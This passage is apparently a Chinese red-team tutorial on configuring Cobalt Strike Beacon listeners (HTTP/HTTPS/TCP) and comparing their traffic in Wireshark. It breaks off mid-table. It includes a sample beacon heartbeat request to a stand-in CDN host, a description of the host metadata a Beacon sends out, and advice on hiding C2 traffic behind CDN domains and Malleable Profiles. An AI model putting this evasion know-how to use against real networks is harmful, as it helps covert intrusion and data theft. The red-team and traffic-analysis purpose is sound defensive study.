Cobalt Strike实战指南:HTTP/HTTPS/TCP Beacon的配置与流量分析
在红队攻防演练中,Cobalt Strike作为一款成熟的C2框架,其核心功能模块Beacon的灵活配置直接关系到隐蔽性和对抗能力。本文将深入解析HTTP/HTTPS/TCP三种基础Beacon的实战应用场景,通过Wireshark抓包对比流量特征,并分享Malleable Profile的定制化技巧。
1. Beacon基础架构与通信原理
Beacon作为Cobalt Strike的植入模块,采用异步通信设计降低暴露风险。其工作流程可分为四个阶段:
- 初始连接阶段:Stager通过短连接下载完整Payload,Stage直接执行内存加载
- 心跳检测阶段:休眠结束后发送系统元数据(包括但不限于):
- 操作系统版本和架构
- 当前用户权限级别
- 进程列表和网络配置
- 任务执行阶段:C2服务器响应指令并附带唯一任务ID
- 结果回传阶段:加密后的执行结果与任务ID绑定返回
bash复制# 典型Beacon心跳包结构示例
GET /pixel.gif?id=12345 HTTP/1.1
Host: cdn.example.com
User-Agent: Mozilla/5.0
Cookie: session=abcdef
注意:默认配置的元数据字段可能泄露敏感信息,需要通过Malleable Profile进行模糊化处理
需要模型API调用? 免费领10W Token,多模型网关一键接入 Claude、DeepSeek 等主流模型。
2. HTTP Beacon配置与流量特征分析
2.1 监听器创建实战
HTTP Beacon适合在需要快速部署的场景中使用,配置时重点关注三个核心参数:
| 参数项 | 示例值 | 安全建议 |
|---|---|---|
| HTTP Host (Stager) | cdn.example.com | 使用CDN域名降低可疑度 |
| HTTP Host (C2) | cdn.example.com | 与Stager |
